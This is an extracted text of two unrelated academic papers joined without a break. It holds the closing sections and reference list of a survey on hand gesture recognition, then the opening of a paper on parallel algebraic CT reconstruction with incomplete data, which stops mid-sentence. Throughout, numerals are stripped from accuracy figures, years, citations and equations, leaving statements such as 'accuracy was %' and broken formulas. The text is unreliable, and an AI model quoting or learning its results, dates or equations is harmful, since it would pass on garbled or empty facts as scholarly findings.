systems and data glove-based hand gesture recognition systems. in jian et al. ( ) hand gestures include dynamic and six static gestures were used, and results showed that gestures were correctly recognized and the accuracy was %. the work in ibrahim et al. ( ) tested the system using ten hand gestures achieving their goal which is to maximize the recognition accuracy using pre-trained networks. the data of javier, paula & robinson ( ) contained six architectures with variance in the hyperparameters and depth, their results achieved good accuracy. classification of hand gestures to improve the rate of recognition accuracy was proposed in jose et al. ( ) reaching . % for simple backgrounds. in aditya et al. ( ) five hand poses with nine class hand gestures were used reaching an accuracy of . % as a result. the work of vimonhak, aranya & somsak ( ) used lao alphabets in the experiments, testing data had gestures from four individuals, it was difficult to maintain constant speed of hand gestures, thus the recognition rate was %. the main difficulties of the hand gesture recognition (andrés & marco, ) with emg using machine learning are: the noisy behavior of emg signal, and the small number of gestures per person relative to the number of generated data by each gesture (overfitting). whereas, in chun-jen et al. ( ) the training process of a deep-learning neural network required a large amount of training data, they combined a large set of computer-generated d hand images with few real camera images to form the training data set, the testing and training sets had classes of hand gestures, and the results accuracy was . %. the authors of deepali & milind ( ) considered different alphabets of american sign language, with a total of samples (consisting of samples of each alphabet), and results gave an accuracy of . %. in study of stefano et al. ( ) to avoid correlation between training and testing datasets the leave one subject out (loso) cross-validation technique was used, and the accuracy was . %. the future of hand gesture recognition despite the high performance of some of the recent methods discussed in this research, the hand gesture recognition is still an evolving topic that needs more experiments. hand gesture recognition method also needs to be extended to cover all of the areas of information technology and artificial intelligence, such as tablets, smartphones, gaming consoles, smart televisions, laptops and desktops (hexa, ). yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. it is no doubt that hand gesture recognition is capable of enabling natural communication and intelligence into applications that humans use every day. hand gesture recognition is employing the principle of perceptual computing and changing the methods of human computer interaction (hci) making them less complex and more enjoyable. applications such as home control systems, healthcare systems, gaming technologies, automobiles, televisions, home automations, and robotics are expected to be able to use hand gesture recognition to represent the communication between the user and the devices (hexa, ). furthermore, some of the applications are very sensitive and in need of having a high recognition accuracy almost close to % to be able to use them without causing any damage or danger to human lives; such as applications of the health field, the transportation field, and the flight operation field. as hand gesture recognition was recently applied in some gaming consoles and has increased the sales rate of these consoles (such as xbox and playstation), it is expected to keep growing more and more over time. smartphones are expected to experience the highest growth of hand gesture recognition (hexa, ). smart televisions are also expected to experience a growth in this topic and increase the purchasing rate of the latest technology using hand gestures (hexa, ). the topic is expected to grow over % from the year to (hexa, ). conclusions this paper had successfully presented the most prominent techniques, applications, and challenges in hand gesture recognition. these include the gesture acquisition methods, the feature extraction process, the classification of hand gestures, the applications that were recently proposed in the field of sign language, robotics and other fields, the environmental surroundings challenges and the datasets challenges that face researchers in the hand gesture recognition process, and the future of hand gesture recognition. the results of this paper can be summarized as the following; the surface electromyography (semg) sensors with wearable hand gesture devices were the most acquisition tools used in the works studied. also, the artificial neural network (ann) was the most applied classifier, the most popular application was using hand gestures for sign language, the dominant environmental surrounding factor that affected the accuracy was the background color, and the common problem found in many of the studies was overfitting in the datasets. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • mais yasen conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • shaidah jusoh conceived and designed the experiments, contributed reagents/material- s/analysis tools, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the data used in the experiments of our research was collected from ieee, and is available at figshare: yasen, mais ( ): literature.rar. figshare. dataset. https: //doi.org/ . /m .figshare. .v . a sample of the data is available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references aashni h, archanasri s, nivedhitha a, shristi p, jyothi sn. . international confer- ence on advances in computing & communications. science direct : – . adam k. . human gestures tools. in: language and cognition in human evolution. cambridge: cambridge university press. adam k. . gesture: visible action as utterance. cambridge: cambridge university press. aditya t, bertram t, frederic g, didier s. . a probabilistic combination of cnn and rnn estimates for hand gesture based interaction in car. in: international symposium on mixed and augmented reality ismar-adjunct. piscatway: ieee, – . alvi m, fatema tj, mohammad ay. . an efficient approach of training artificial neural network to recognize bengali hand sign. in: international conference on advanced computing iacc. piscatway: ieee, – . ananta s, piyanuch s. . artificial neural networks for gesture classification with inertial motion sensing armbands. in: conference tencon. piscatway: ieee, – . ananya c, anjan kumar t, kandarpa kumar s. . a review on vision-based hand gesture recognition and applications. igi global : – . ananyaa s, ayush k, kavleen k, shivani j, richa u, sameer p. . vision based static hand gesture recognition techniques. in: international conference on communication and signal processing iccsp. piscatway: ieee, – . andrea a. . advantages and drawbacks of gesture-based interaction. computer science—miscellaneous : – . yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. andrés gj, marco eb. . real-time hand gesture recognition with emg using machine learning. in: ecuador technical chapters meeting etcm. piscatway: ieee, – . anna y, sung mc, jae-gon k. . detection and recognition of hand gesture for wear- able applications in iomt. in: international conference on advanced communication technology icact. piscatway: ieee, – . anshal j, heidy s, emmanuel a. . american sign language translation using edge detection and cross correlation. in: colombian conference on communications and computing colcom. piscatway: ieee, – . arpita rs, sanyal g, majumder s. . hand gesture recognition systems: a survey. international journal of computer applications : – . ashish sn, aarti ga. a. bilingual sign recognition using image based hand gesture technique for hearing and speech impaired people. in: international conference on computing communication control and automation iccubea. piscatway: ieee, – . ashish sn, aarti ga. b. sign language recognition using image based hand gesture recognition techniques. in: international conference on green engineering and technologies ic-get. piscatway: ieee, – . atharva ak, apurv dj. . dynamic hand gesture recognition using kinect. in: innovations in power and advanced computing technologies i-pact. piscatway: ieee, – . biyao s, yifeng x, hongnan y, yatong j, chenggang y, hongtao x, yangang w. . a new dataset for hand gesture estimation. in: global conference on signal and information processing globalsip. piscatway: ieee, – . bradley lj. . it’s happening now: perceptual computing is real. webopedia. available at http://www.webopedia.com (accessed on may ). chenyang l, xin z, lianwen j. . lpsnet: a novel log path signature feature based hand gesture recognition framework. in: international conference on computer vision workshops iccvw. piscatway: ieee, – . chenyang z, yingli t, matt h. . multi-modality american sign language recog- nition. in: international conference on image processing icip. piscatway: ieee, – . chun-jen t, yun-wei t, song-ling h, ya-chiu w. . synthetic training of deep cnn for d hand gesture identification. in: international conference on control. artificial intelligence. robotics & optimization iccairo. piscatway: ieee, – . danling l, yuanlong y, huaping l. . gesture recognition using data glove: an extreme learning machine method. in: international conference on robotics and biomimetics robio. piscatway: ieee, – . david vr, donghan k. . hand gestures recognition using machine learning for control of multiple quadrotors. in: sensors applications symposium sas. piscatway: ieee, – . deepali nk, chitode js. . dynamic hand gesture recognition: a literature review. international journal of engineering research & technology : – doi . /ijret. . . yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.webopedia.com http://dx.doi.org/ . /ijret. . http://dx.doi.org/ . /peerj-cs. deepali n, milind k. . real time sign language recognition using the leap motion controller. in: international conference on inventive computation technologies icict, vol. . piscatway: ieee, – . devendrakumar hp, kakade sm. . dynamic hand gesture recognition using kinect sensor. in: international conference on global trends in signal processing. information computing and communication icgtspicc. piscatway: ieee, – . donq-liang l, wei-shiuan y. . recognition of complex static hand gestures by using the wristband-based contour features. iet image processing : – doi . /iet-ipr. . . eko p, surya s, rafiidha sl. . classification of hand gesture in indonesian sign language system using naive bayes. in: international seminar on sensors. instrumen- tation. measurement and metrology. piscatway: ieee, – . elecbits. . gesture control robotic vehicle. available at http://www.elecbits.in/ product/gesture-control-robotic-vehicle (accessed on may ). erhan a, hakan t, baran u. . hand gesture classification using inertial based sensors via a neural network. in: international conference on electronics, circuits and systems. piscatway: ieee, – . fabian s, thomas k, alexander g, uwe h. . free-hand gesture recognition with d-cnns for in-car infotainment control in real-time. in: international conference on intelligent transportation systems itsc. piscatway: ieee, – . fuchang y, hijian s. . research on static hand gesture recognition technology for human computer interaction system. in: international conference on intelligent transportation. piscatway: ieee, – . gunawardane pdsh, nimali tm. . comparison of hand gesture inputs of leap motion controller & data glove in to a soft finger. in: international symposium on robotics and intelligent sensors iris. piscatway: ieee, – . hafız ma-r, lehmia k, danish mirrani m, noman maraaj m. . cmswvhg- control ms windows via hand gesture. in: international multi-topic conference inmic. piscatway: ieee, – . haitham b, alaa h, sabah h. . new method for optimization of static hand gesture recognition. in: intelligent systems conference intellisys. piscatway: ieee, – . hang z, jiangping h, yuping z, hong c. . hand gesture based control strategy for mobile robots. in: chinese control and decision conference ccdc. piscatway: ieee, – doi . /ccdc. . . hari pg, haresh sc, siddhartha m, tanima d, kulwant s. . a continu- ous hand gestures recognition technique for human-machine interaction using accelerometer and gyroscope sensors. sensors journal : – doi . /jsen. . . hexa r. . gesture recognition market analysis by technology d. d. by application tablets & notebooks. smartphones. gaming consoles. smart televisions. in: laptops & desktops and segment forecasts – . piscatway: ieee, – . yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /iet-ipr. . http://www.elecbits.in/product/gesture-control-robotic-vehicle http://www.elecbits.in/product/gesture-control-robotic-vehicle http://dx.doi.org/ . /ccdc. . http://dx.doi.org/ . /jsen. . http://dx.doi.org/ . /peerj-cs. himadri ns, shinjini r, sudipta s, sayan t, suhrid kc. . a machine learning based approach for hand gesture recognition using distinctive feature extraction. in: computing and communication workshop and conference. piscatway: ieee, – . ibrahim a, hashim a, faisal k, youngwook k. . hand gesture recognition using input impedance variation of two antennas with transfer learning. sensors journal : – . isack b, zhongfu y, jamal b. . higher-order local autocorrelation feature extraction methodology for hand gestures recognition. in: international conference on multime- dia and image processing icmip. piscatway: ieee, – . jakub t, tomasz m, piotr k. . influence of semg electrode matrix configuration on hand gesture recognition performance. in: signal processing: algorithms, architectures, arrangements and applications spa. piscatway: ieee, – . javier opa, paula cum, robinson jm. . convolutional neural network architecture for hand gesture recognition. in: international conference on electronics, electrical engineering and computing. piscatway: ieee, – . jessie rb, dionis ap, felicito sc, janette cf, carlos ch, cyrel om, christine ksb, ezra gf, lanuelle tv. . sign language word translator using neural networks for the aurally impaired as a tool for communication. in: international conference on control system. computing and engineering iccsce. piscatway: ieee, – . jiajun z, zhiguo s. . deformable deep convolutional generative adversarial network in microwave based hand gesture recognition system. in: international conference on wireless communications and signal processing wcsp. piscatway: ieee, – . jian z, jingna m, guijin w, huazhong y, bo z. . a miniaturized wearable wireless hand gesture recognition system employing deep-forest classifier. in: biomedical circuits and systems conference. piscatway: ieee, – . jinxing y, jianhong p, jun l. . semg-based continuous hand gesture recognition using gmm-hmm and threshold model. in: international conference on robotics and biomimetics robio. piscatway: ieee, – . jose c, flores l, gladys cutipa ae, lauro enciso r. . application of convolutional neural networks for static hand gestures recognition under different invariant fea- tures. in: international conference on electronics, electrical engineering and computing. piscatway: ieee, – . jozef g, slavomír k. . hand gesture recognition using d sensors. in: international symposium elmar. piscataway: ieee, – . karthik sk, akash s, srinath r, shitij k. . recognition of human arm gestures using myo armband for the game of hand cricket. in: international symposium on robotics and intelligent sensors iris. – . kuang-yow l, chun-chieh c, yong-jie h, wen-tsai s. . wearable armband for real time hand gesture recognition. in: international conference on systems, man and cybernetics. piscatway: ieee, – . lalit k, pritee k. . vision-based mid-air unistroke character input using polar signatures. transactions on human-machine systems : – doi . /thms. . . yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /thms. . http://dx.doi.org/ . /peerj-cs. laura d, angelo ms, paolo d. . a survey of glove-based systems and their applica- tions. ieee transactions on systems, man, and cybernetics : – . marco eb, andrés gj, jonathan az, andrés p, víctor ha. a. hand gesture recognition using machine learning and the myo armband. in: european signal processing conference. piscatway: ieee, – . marco eb, cristhian m, jonathan az, andrés gj, carlos ea, patricio z, marco s, freddy bp, maría p. b. real-time hand gesture recognition using the myo armband and muscle activity detection. in: second ecuador technical chapters meeting etcm. piscatway: ieee, – . margaret r. . analytics tools help make sense of big data. aws. available at http: //searchbusinessanalytics.techtarget.com (accessed on may ). marlon o, alistair s, mohamed f. . two-stage pca with interpolated data for hand shape recognition in sign language. in: applied imagery pattern recognition workshop aipr. – . meenakshi p, pawan singh m. . hand gesture recognition for human computer interaction. in: international conference on image information processing. piscatway: ieee, – . microsoft. . kinect gestures. available at https://support.xbox.com/en-us/xbox- /accessories/body-controller (accessed on may ). moher d, liberati a, tetzlaff j, altman dg. . prisma group. preferred reporting items for systematic reviews and meta-analyses: the prisma statement. plos medicine :e doi . /journal.pmed. . mohini g, rohini r, reddy pevv, bhanu prakash p, kumar ktps. . gesture controlled metal detecting land rover. international journal of engineering trends and technology : – . nabeel s, rosa hm, chan rhm. . a wearable hand gesture recognition device based on acoustic measurements at wrist. in: international conference of the ieee engineering in medicine and biology society embc. piscatway: ieee, – doi . /embc. . . nilima mp, patil sr. . review on real-time emg acquisition and hand gesture recognition system. in: international conference of electronics. communication and aerospace technology iceca. piscatway: ieee, – . oinam rc, anushree p, spandan s, piyanka d. . comparative study for vision based and data based hand gesture recognition technique. in: international conference on intelligent communication and computational techniques. piscatway: ieee, – . oyndrila d, puskar d, sagnik m, sayantan n, tamal c, sourav s. . computer vi- sion based framework for digit recognition by hand gesture analysis. in: information technology, electronics and mobile communication conference iemcon. – . peijun b, ana im, carlos rd-b, narciso g. . tiny hand gesture recognition without localization via a deep convolutional network. ieee transactions on consumer electronics : – . yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://searchbusinessanalytics.techtarget.com http://searchbusinessanalytics.techtarget.com https://support.xbox.com/en-us/xbox- /accessories/body-controller https://support.xbox.com/en-us/xbox- /accessories/body-controller http://dx.doi.org/ . /journal.pmed. http://dx.doi.org/ . /embc. . http://dx.doi.org/ . /peerj-cs. piotr k, tomasz m, jakub t. . towards sensor position-invariant hand gesture recognition using a mechanomyographic interface. in: signal processing: algorithms, architectures, arrangements and applications spa. piscatway: ieee, – . prashan p. . historical development of hand gesture recognition. in: cognitive science and technology book series csat. singapore: springer, – . praveen ks, shreya s. . evolution of hand gesture recognition: a review. interna- tional journal of engineering and computer science : – . qingrui z, mingqiang y, qinghe z, xinxin z. . segmentation of hand gesture based on dark channel prior in projector-camera system. in: international conference on communications in china iccc. piscatway: ieee, – . rafiqul zk, noor ai. . hand gesture recognition: a literature review. international journal of artificial intelligence & applications : – doi . /ijaia. . . rajeshree r-s, jayashree s. . dynamic hand gesture recognition. in: international conference on signal and information processing iconsip. piscatway: ieee, – . rania ae, mohammed ss, mahmoud ia. . hand gesture recognition based on dimensionality reduction of histogram of oriented gradients. in: japan-africa conference on electronics, communications and computers jac-ecc. piscatway: ieee, – . rasel ab, abdul kt, akm a, jungpil s, md rashedul i. . reduction of gesture feature dimension for improving the hand gesture recognition performance of numerical sign language. in: international conference of computer and information technology iccit. piscatway: ieee, – . reshna s, jayaraju m. . spotting and recognition of hand gesture for indian sign language recognition system with skin segmentation and svm. in: international conference on wireless communications, signal processing and networking wispnet. piscatway: ieee, – . rishabh s, raj s, nutan vb, prachi rr. . interactive projector screen with hand detection using gestures. in: international conference on automatic control and dynamic optimization techniques icacdot. piscatway: ieee, – . riya b, ankita b, aradhya s, tanu g, ankush m. . isl gesture recognition using multiple feature fusion. in: international conference on wireless communications. signal processing and networking wispnet. piscatway: ieee, – . rokhsana t, ashfaq ur, hasan uz, hafiz ar. . a novel design of an intangible hand gesture controlled computer mouse using vision based image processing. in: international conference on electrical information and communication technology eict. piscatway: ieee, – . rosalina , lita y, nur h, wahyu rb, rusdianto r, yuyu w. . implementation of real-time static hand gesture recognition using artificial neural network. in: th international conference on computer applications and information processing technology (caipt). – doi . /caipt. . . rytis a, arunas l. . robust hand detection using arm segmentation from depth data and static palm gesture recognition. in: international conference on intelligent data yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ijaia. . http://dx.doi.org/ . /caipt. . http://dx.doi.org/ . /peerj-cs. acquisition and advanced computing systems: technology and applications. piscataway: ieee, – . salunke tp, bharkad sd. . power point control using hand gesture recognition based on hog feature extraction and k-nn classification. in: international conference on computing methodologies and communication. piscataway: ieee, – doi . /iccmc. . . samata m, kinage ks. . study on hand gesture recognition. international journal of computer science and mobile computing : – . shaun c, walter k, ryan m, julie k, tanner h, lijun y. . hand gesture recognition using a skeleton-based feature representation with a random regression forest. in: international conference on image processing icip. piscataway: ieee, – . shengchang l, zonglong h, haoyu t, kai y, wenshuang y. . a hand gesture recognition system based on ghz radars. in: international symposium on antennas and propagation isap. piscataway: ieee, – . shome sd. . detection of self intersection in synthetic hand pose generators. in: international conference on machine vision applications mva. piscataway: ieee, – . shunzhan h, chenguang y, min w, long c, zedong h. . hand gesture recognition using myo armband. in: chinese automation congress cac. piscataway: ieee, – . sih-huei c, ari h, yuan-shan l, jia-ching w. . hand gesture recognition based on bayesian sensing hidden markov models and bhattacharyya divergence. in: international conference on image processing icip. piscataway: ieee, – . siji rani s, dhrisya kj, ahalyadas m. . international conference on advances in computing. in: communications and informatics icacci. piscataway: ieee, – . soukaina cm, mohamed am, jamal r, hamid t. . hand gesture recognition based on convexity approach and background subtraction. in: international conference on intelligent systems and computer vision iscv. piscataway: ieee, – . soumya cv, muzameel a. . artificial neural network based identification and classification of images of bharatanatya gestures. in: international conference on innovative mechanisms for industry applications icimia. piscataway: ieee, – . srinidhi h, ramakrishna p, ramya h, ehtesham h. . gestar: real time gesture interaction for ar with egocentric view. in: international symposium on mixed and augmented reality ismar-adjunct. piscataway: ieee, – . stefano s, paolo mr, david afg, fabio r, rossana t, elisa c, danilo d. . on-line event-driven hand gesture recognition based on surface electromyographic signals. in: international symposium on circuits and systems iscas. piscataway: ieee, – . sungho s, wonyong s. . dynamic hand gesture recognition for wearable devices with low complexity recurrent neural networks. in: international symposium on circuits and systems iscas. piscataway: ieee, – . takuya s, xiaomeng g, ehsan y, ashikur r, olga b-l, victor ml. . radar-based hand gesture recognition using i-q echo plot and convolutional neural network. yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /iccmc. . http://dx.doi.org/ . /peerj-cs. in: conference on antenna measurements & applications cama. piscataway: ieee, – . vaibhavi sg, akshay ak, sanket nr, vaishali at, shabnam ss. . a review of various gesture recognition techniques. international journal of engineering and computer science : – . vedha viyas t, willbert baskar r, simrose gabriel n, sanjive a. . hand pan- tomime apperception for robotic arm control. in: international conference of electronics, communication and aerospace technology iceca. piscataway: ieee, – . vimonhak s, aranya w, somsak w. . hand gesture recognition for lao alphabet sign language using hog and correlation. in: th international conference on electrical engineering/electronics, computer, telecommunications and information technology (ecti-con). piscataway: ieee, – . vivek dl, ramesh m, kagalkar . . methodology for real time hand gesture recog- nition and generating text description using histogram techniques. in: international conference on intelligent computing and control i c . – . vladislava b, predrag t, goran k. . hand gesture recognition using neural network based techniques. in: symposium on neural networks and applications neurel. – . washef a, kunal c, soma m. . vision based hand gesture recognition using dynamic time warping for indian sign language. in: international conference on information science icis. – . weiguo z, congyi l, xin j, peng l, haoyao c, yun-hui l. . real-time implementa- tion of vision-based unmarked static hand gesture recognition with neural networks based on fpgas. in: international conference on robotics and biomimetics robio. piscataway: ieee, – . xi l, chen l, lihua t. . hand gesture recognition based on wavelet invariant moments. in: international symposium on multimedia ism. piscataway: ieee, – . xiang g, lei s, qiang w. . the design of robotic wheelchair control system based on hand gesture control for the disabled. in: international conference on robotics and automation sciences. piscataway: ieee, – . xinghao c, hengkai g, guijin w, li z. . motion feature augmented recurrent neu- ral network for skeleton-based dynamic hand gesture recognition. in: international conference on image processing icip. piscataway: ieee, – . yifan z, congqi c, jian c, hanqing l. . egogesture: a new dataset and benchmark for egocentric hand gesture recognition. transactions on multimedia : – doi . /tmm. . . yiwen h, jianyu y, zhanpeng s, youfu l. . salient feature point selection for real time rgb-d hand gesture recognition. in: international conference on real-time computing and robotics rcar. piscataway: ieee, – . yu q, zhiquan f, xiaoyan z, xiaohui y. . principle component analysis based hand gesture recognition for android phone using area features. in: international conference on multimedia and image processing icmip. piscataway: ieee, – . yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tmm. . http://dx.doi.org/ . /peerj-cs. yuefeng l, keshi h, xueli s, honghai l. . human-machine interface based on multi-channel single-element ultrasound transducers: a preliminary study. in: international conference on e-health networking. applications and services healthcom. piscataway: ieee, – . yuhui z, shuo j, peter bs. . wrist-worn hand gesture recognition based on barometric pressure sensing. in: international conference on wearable and implantable body sensor networks bsn. piscataway: ieee, – . yuntao m, yuxuan l, ruiyang j, xingyang y, raza s, samuel w, ravi v. . hand gesture recognition with convolutional neural networks for the multimodal uav control. piscataway: ieee, – . yuta s, fumihiko n, wataru k, takashi k, maki s. . behind the palm: hand gesture recognition through measuring skin deformation on back of hand by using optical sensors. in: conference of the society of instrument and control engineers of japan. piscataway: ieee, – . zengshan t, jiacheng w, xiaolong y, mu z. . wicatch: a wi-fi based hand gesture recognition system access. ieee access : – . zhiwen l, xiaoxiao y, yanzhou g, weixing h, jian w, guigang z. . a robust hand cursor interaction method using kinect. in: international symposium on multimedia ism. piscataway: ieee, – . yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. implementation of the computer tomography parallel algorithms with the incomplete set of data implementation of the computer tomography parallel algorithms with the incomplete set of data mariusz pleszczyński faculty of applied mathematics, silesian technical university of gliwice, gliwice, Śląskie, poland abstract computer tomography has a wide field of applicability; however, most of its applications assume that the data, obtained from the scans of the examined object, satisfy the expectations regarding their amount and quality. unfortunately, sometimes such expected data cannot be achieved. then we deal with the incomplete set of data. in the paper we consider an unusual case of such situation, which may occur when the access to the examined object is difficult. the previous research, conducted by the author, showed that the ct algorithms can be used successfully in this case as well, but the time of reconstruction is problematic. one of possibilities to reduce the time of reconstruction consists in executing the parallel calculations. in the analyzed approach the system of linear equations is divided into blocks, such that each block is operated by a different thread. such investigations were performed only theoretically till now. in the current paper the usefulness of the parallel-block approach, proposed by the author, is examined. the conducted research has shown that also for an incomplete data set in the analyzed algorithm it is possible to select optimal values of the reconstruction parameters. we can also obtain (for a given number of pixels) a reconstruction with a given maximum error. the paper indicates the differences between the classical and the examined problem of ct. the obtained results confirm that the real implementation of the parallel algorithm is also convergent, which means it is useful. subjects artificial intelligence, computer aided design, computer vision, optimization theory and computation, scientific computing and simulation keywords computer tomography, parallel algorithms, incomplete set of data, big data, signal and data processing introduction computer tomography has a very wide field of applicability. except the classical application in medicine (donegani et al., ), for which the concepts and the first tomograph have been developed (hounsfield, ), the methods of computer tomography are used in many other areas as well. in general, the computer tomography founds an application whenever there appears a need of examining the object inside, without affecting its structure (cozzolino et al., ; gong, nie & xu, ; yao, liu & xu, ; kamath et al., ). the whole process of tomograph examination can be divided into two main stages: collection of data and transformation of these data into image. the research executed for how to cite this article pleszczyński m. . implementation of the computer tomography parallel algorithms with the incomplete set of data. peerj comput. sci. :e doi . /peerj-cs. submitted october accepted november published february corresponding author mariusz pleszczyński, mariusz.pleszczynski@polsl.pl academic editor robertas damaševičius additional information and declarations can be found on page doi . /peerj-cs. copyright pleszczyński distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:mariusz.�pleszczynski@�polsl.�pl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ the first stage consists in selecting the radiation beam, the radiation type, or in minimization of the necessary radiation dose, which is especially important for medical tomography (malczewski, ). the second stage assumes that the data are already collected and ready to be transformed into the image of interior of the investigated object. this part is executed with the aid of the selected reconstruction algorithms. such algorithms can be divided into two groups: analytical algorithms (averbuch & shkolnisky, ; lewitt, ; waldén, ) and algebraic algorithms (andersen, ; gordon, bender & herman, ; guan & gordon, ). the former group of algorithms is very good in the classical applications of computer tomography, when the collected data satisfy the assumption of kotelnikov theorem (natterer, ), which states, in general, that the initial data must be sufficiently numerous and of sufficiently good quality. however sometimes this assumption is impossible to fulfill, because, for example, of the size of examined object or its inaccessibility. we have then the situation of incomplete data set. as the studies have shown, the application of analytical algorithms is ineffective in the case of incomplete data set, whereas the algebraic algorithms can be successfully used (hetmaniok, ludew & pleszczyński, ). the approach in case of the incomplete set of data is important with respect of possible applications, for example, in examination of the mine coal seam (see “problem with the incomplete set of data”). the seam of coal may include the accumulations of unwanted rocks (which is important for economic reasons) or the areas of compressed gas (which is even more important because of the safety reasons). the compressed gas may explode during the coal seam exploitation causing the rock and gas ejections and the bumps, extremely dangerous for life and health of working people. for example, in polish coal mines, in the second half of the th century miners died because of that reason. the biggest catastrophe of this kind happened on the th september in the coal mine in nowa ruda, where miners have been killed. obviously there exist some methods of examining the mine coal seam before its exploitation, but these methods are invasive, time- and energy-consuming, which means that they are not very safe and significantly increase the mining costs. the research, conducted so far, shows that the selected algorithms, belonging to the group of algebraic algorithms, can be applied for solving the problem with the incomplete set of data (for example in examination of the mine coal seam), however the specifics of such received data causes that the reconstruction process takes significantly more time than in classical approach. therefore, the algorithms using the parallel computations are proposed, the aim of which is to reduce the time needed to examine the internal structure of the studied object. till now such algorithms have been developed and studied only theoretically (hetmaniok, ludew & pleszczyński, ), and simulated only for the one-thread process. goal of the current paper is to investigate the convergence of such algorithms in case when the parallel computations are executed with the real application of several cores/threads. this study will be the ground for the further research on effectiveness of these algorithms in comparison with the sequential algorithms. pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ideas of the computer tomography assuming that the distribution of density in the interior of examined object is described by means of function f(x,y) (which can be the continuous function as well as the discrete function), the computer tomography is meant to reconstruct this function on the basis of scans of this object along some paths l. each scan (projection) informs how many energy is lost by the given ray along the given path. since every sort of materia is characterized by the individual absorption of energy (e.g., for x-rays, where it refers to water which is assigned material density . (kg/m ), attenuation coefficient hounsfield units (hu), muscle tissue has , (kg/m ) and hu, blood: , (kg/m ) and hu, bone males: , (kg/m ) and , hu), therefore the function f(x,y) can be retrieved on the ground of such data, described by equation p ¼ pl � ln i i ¼ r l f ðx; yÞdl, where l denotes the mention path, pl means the projection obtained in this path, i is the initial intensity of radiation, whereas i is the final intensity. at the beginning of the last century it has been proven (radon, ) that the reconstruction of function f(x,y) is possible based on the infinitely many projections. assumption of possessing infinitely many projections is impossible to fulfill in real life. in practice it is possible to get only finite number of projections, therefore very important for development of computer tomography are the works (louis, a, b) presenting the conditions connecting the number of projections (this number consists of the number of scanning angles and the number of rays in one beam) with the possibility of reconstructing the function f(x,y). the analytical algorithms, mentioned above, are based, among others, on the fourier and radon transforms, and also on the concept of filtered backprojection, therefore they cannot be used for the projections of insufficiently good quality. for this reason we will consider only the algebraic algorithms. algebraic algorithms in the algebraic algorithms it is assumed that the examined object is located in the rectangle (or square, very often), which can be divided into n = n smaller congruent squares (pixels). size of these pixels enables to assume that the reconstructed function f(x,y) takes on unknown constant value in each pixel. thanks to this, by knowing the initial energy of radiation and the energy of the given ray after passing through the investigated object (in this way we know the value of lost energy, that is the value of projection), the equation of path passed by the ray, the density of discretization (number of pixels) and keeping in mind the fact that every sort of materia is characterized by the individual capacity of energy absorption, we can calculate the total energy loss for the given ray (the value of projection) as the sum of energy losses in every pixel met by the ray. the loss of energy in one pixel is proportional to the road passed by the ray in this pixel (this value is known) and to the unknown value of function f(x,y) in this pixel (values of this function should be found). considering every ray individually we obtain a system of linear equations (single scanning is represented by one line of this system): ax ¼ b; ( ) pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where a denotes a matrix of dimension m × n containing the non-negative real elements, m means the number of projections and n = n means the number of pixels, x denotes a matrix (vector) of length n containing the unknown elements—each ith element of this matrix represents the unknown constant value of the reconstructed function f(x,y) for ith pixel, finally b is a matrix (vector of length m) of projections. the algebraic algorithms differ from each other in the method of solving the system ( ). since matrix a has some specific characteristics: � it is a sparse and nonsymmetric matrix (the vast majority of elements is equal to zero ), � it is not a square matrix (mostly there is definitely more rows than columns), � it is nonsingular matrix, � its dimension is very big, therefore for solving the system ( ) we cannot apply the classical methods dedicated to the solution of the systems of linear equations. kaczmarz algorithm most of the algebraic algorithms is based on the kaczmarz algorithm, the convergence of which has been proven at first for the square systems (kaczmarz, ) and next also for the rectangle systems (tanabe, ). this algorithm starts by selecting any initial solution xð Þ rn, and every successive approximation of solution x(k), k n, is computed as the orthogonal projection of the previous solution onto hyperplane hi, i = (k − ,m) + , where hyperplane hi is represented by the respective line of system ( ), that is hi ¼ fx rn : ai � x ¼ pig, where operation ∘ is defined as the classic scalar product of vectors from space rn, ai denotes the ith row of matrix a, pi means the ith projection, that is pi = bi is the ith element of vector b, i = (k − , m) + . geometric interpretation of this algorithm is presented in fig. . algorithm art for many years the kaczmarz algorithm was not applied. thanks to papers (gordon, bender & herman, ; tanabe, ) it was modified to algorithm art and in this form it has found an application in computer tomography. algorithm art, similarly like the kaczmarz algorithm, starts by choosing any initial solution xð Þ rn and the next approximations of solution are created by means of the following relation xðkþ Þ ¼ xðkÞ þ �k pi � ai � xðkÞ kaik ai ( ) where the same notations hold, as before, additionally ||·|| means the norm of vector (that is the length of vector) and � r denotes the relaxation coefficient. similarly like in case of other algorithms discussed in this paper, we can speed up the 